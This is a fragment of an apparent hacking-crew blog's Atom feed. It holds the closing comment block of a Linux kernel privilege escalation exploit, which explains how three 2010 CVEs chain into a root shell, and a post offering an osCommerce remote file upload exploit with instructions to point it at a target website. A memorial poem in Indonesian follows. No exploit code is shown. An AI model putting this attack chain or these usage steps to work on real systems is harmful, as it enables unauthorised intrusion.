comments"&gt;* This is the interesting one, and the reason I wrote this exploit.  If a&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* word will be written to a user-specified pointer when that thread exits.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* This write is done using put_user(), which ensures the provided destination&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* resides in valid userspace by invoking access_ok().  However, Nelson&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* discovered that when the kernel performs an address limit override via&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* etc.), this override is not reverted before calling put_user() in the exit&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* path, allowing a user to write a NULL word to an arbitrary kernel address.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Note that this issue requires an additional vulnerability to trigger.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* CVE-2010-3849&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* -------------&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* This is a NULL pointer dereference in the Econet protocol.  By itself, it's&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* fairly benign as a local denial-of-service.  It's a perfect candidate to&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* trigger the above issue, since it's reachable via sock_no_sendpage(), which&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* subsequently calls sendmsg under KERNEL_DS.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* CVE-2010-3850&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* -------------&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* I wouldn't be able to reach the NULL pointer dereference and trigger the&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* OOPS if users weren't able to assign Econet addresses to arbitrary&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* interfaces due to a missing capabilities check.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* In the interest of public safety, this exploit was specifically designed to&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* be limited:&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*  * The particular symbols I resolve are not exported on Slackware or Debian&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*  * Red Hat does not support Econet by default&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*    Debian&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* However, the important issue, CVE-2010-4258, affects everyone, and it would&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* more sophisticated version of this that doesn't have the roadblocks I put in&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* to prevent abuse by script kiddies.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* NOTE: the exploit process will deadlock and stay in a zombie state after you&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* exit your root shell because the Econet thread OOPSes while holding the&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;code class="spaces"&gt; &lt;/code&gt;&lt;code class="cpp comments"&gt;*/&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.exploit-db.com/exploits/15704/"&gt;&lt;span style="font-weight: bold;"&gt;Download Full&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6555978698869605259?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/yiVnSoxkj20hNeh9ru1PTuyYuJ8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yiVnSoxkj20hNeh9ru1PTuyYuJ8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/yiVnSoxkj20hNeh9ru1PTuyYuJ8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yiVnSoxkj20hNeh9ru1PTuyYuJ8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/SDfStmcR9zM" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6555978698869605259?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6555978698869605259?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/SDfStmcR9zM/linux-kernel-2637-local-privilege_20.html" title="Linux Kernel  2.6.37 Local Privilege Escalation" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2010/12/linux-kernel-2637-local-privilege_20.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkQASHc6cCp7ImA9Wx9XEEs.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-1557096129632059316</id><published>2010-12-20T12:45:00.008+07:00</published><updated>2011-01-03T21:19:09.918+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-03T21:19:09.918+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Exploit" /><title>Oscommerce Online Merchant v2.2</title><content type="html">&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TQ76gdyCVjI/AAAAAAAAAD0/-CUHRWSKv7s/s1600/oscommerce.jpg"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 421px; height: 239px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TQ76gdyCVjI/AAAAAAAAAD0/-CUHRWSKv7s/s320/oscommerce.jpg" alt="" id="BLOGGER_PHOTO_ID_5552650826251654706" border="0" /&gt;&lt;/a&gt;                                                                     &lt;span style="color: rgb(255, 0, 0);"&gt;Recode by arianom&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;code class="plain plain"&gt;&lt;/code&gt;[$] Exploit Title     : Oscommerce Online Merchant v2.2 - Remote File Upload&lt;br /&gt;[$] Date              : 30-05-2010        &lt;br /&gt;[$] Author            : MasterGipy&lt;br /&gt;[$] Email             : mastergipy [at] gmail.com&lt;br /&gt;[$] Bug               : Remote File Upload&lt;br /&gt;[$] Vendor            : http://www.oscommerce.com&lt;br /&gt;[$] Google Dork       : n/a&lt;br /&gt;[%] vulnerable file: /admin/file_manager.php&lt;br /&gt;[$] Exploit: &lt;code class="plain plain"&gt;&lt;/code&gt;&lt;a style="font-weight: bold;" href="http://8edcd2a7.linkbucks.com"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;code class="plain plain"&gt;Note:&lt;br /&gt;&lt;/code&gt;Open and edit script,&lt;br /&gt;Change http://kill-9.org with your website target.&lt;br /&gt;   Then upload to shell or hosting. Run it and Resolve to the Target.&lt;br /&gt;Good Luck,,Bro&lt;br /&gt;&lt;br /&gt;Greats : All Kill-9 Crew and IndonesianCoder Team , Malang-Cyber Crew and You&lt;br /&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;span&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt1"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;span&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;div class="line alt2"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="content"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;code class="plain plain"&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1557096129632059316?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/xpOuuMD4Qxz18173xI67jneKoec/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xpOuuMD4Qxz18173xI67jneKoec/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/xpOuuMD4Qxz18173xI67jneKoec/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xpOuuMD4Qxz18173xI67jneKoec/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/NaqwkoljR14" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1557096129632059316?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1557096129632059316?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/NaqwkoljR14/oscommerce-online-merchant-v22.html" title="Oscommerce Online Merchant v2.2" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_t3RQMzRGaJs/TQ76gdyCVjI/AAAAAAAAAD0/-CUHRWSKv7s/s72-c/oscommerce.jpg" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2010/12/oscommerce-online-merchant-v22.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0UFQ3c7fyp7ImA9WhRTE08.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-6670743358588172649</id><published>2010-12-20T00:04:00.002+07:00</published><updated>2011-11-03T20:00:12.907+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-03T20:00:12.907+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><title>Just in Memorian</title><content type="html">&lt;div style="text-align: center;"&gt;&lt;span style=";font-size:180%;color:blue;"  &gt;&lt;i&gt;&lt;b&gt;Tutina Fitri &lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style=";font-size:4.5px;color:blue;"  &gt;malang, juli '03&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://arianom.net/"&gt;&lt;img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 194px; height: 259px;" src="http://1.bp.blogspot.com/_t3RQMzRGaJs/TQ7-RUw_pfI/AAAAAAAAAD8/VFwz83q4jqc/s320/sadness.jpg" alt="" id="BLOGGER_PHOTO_ID_5552654964179838450" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;center&gt;&lt;a href="http://arianom.net/"&gt;&lt;span style="color:blue;"&gt;&lt;i&gt;Dear...Kadang kita berharap&lt;br /&gt;Tuhan akan menunjuk jalan kita&lt;br /&gt;dan membuka sedikit tabir rahasianya.&lt;br /&gt;Seperti matahari yang terbit di timur dan terbenam di barat&lt;br /&gt;atau seperti waktu yang tidak pernah berhenti,&lt;br /&gt;perasaanku akan selalu dekat denganmu&lt;br /&gt;Sepi bicara,&lt;br /&gt;betapa sempitnya waktu, betapa terasa besarnya cinta,&lt;br /&gt;jikapun aku percaya ada hidup setelah mati, kita tidak akan pernah bertemu lagi.&lt;br /&gt;Dear...Kita selalu mencoba untuk menghargai hidup agar lebih berarti,&lt;br /&gt;meskipun kecil tapi embun adalah pertanda datangnya musim semi.&lt;br /&gt;Suara burung atau bunyi yang indah adalah bukan pilihan,&lt;br /&gt;keduanya akan selalu ingin kita nikmati.&lt;br /&gt;Jika aku harus memilih aku tidak akan memilih&lt;br /&gt;karna angin akan selalu membawa legenda cerita kita&lt;br /&gt;yang akan selalu berakhir bahagia.&lt;br /&gt;Hanya waktu yang bisa merenggutmu dariku..&lt;/i&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: right; font-style: italic;"&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="color: rgb(51, 0, 153);"&gt;sumbersari gang 5/503&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;center&gt; &lt;span style="color:blue;"&gt; &lt;/span&gt;&lt;/center&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6670743358588172649?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/eQ_pwpzFYY_hWZdW1_iFgTqQaHs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/eQ_pwpzFYY_hWZdW1_iFgTqQaHs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/eQ_pwpzFYY_hWZdW1_iFgTqQaHs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/eQ_pwpzFYY_hWZdW1_iFgTqQaHs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/9cxfXpluUak" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6670743358588172649?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6670743358588172649?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/9cxfXpluUak/just-in-memorian.html" title="Just in Memorian" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_t3RQMzRGaJs/TQ7-RUw_pfI/AAAAAAAAAD8/VFwz83q4jqc/s72-c/sadness.jpg" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2010/12/just-in-memorian.html</feedburner:origLink></entry></feed>

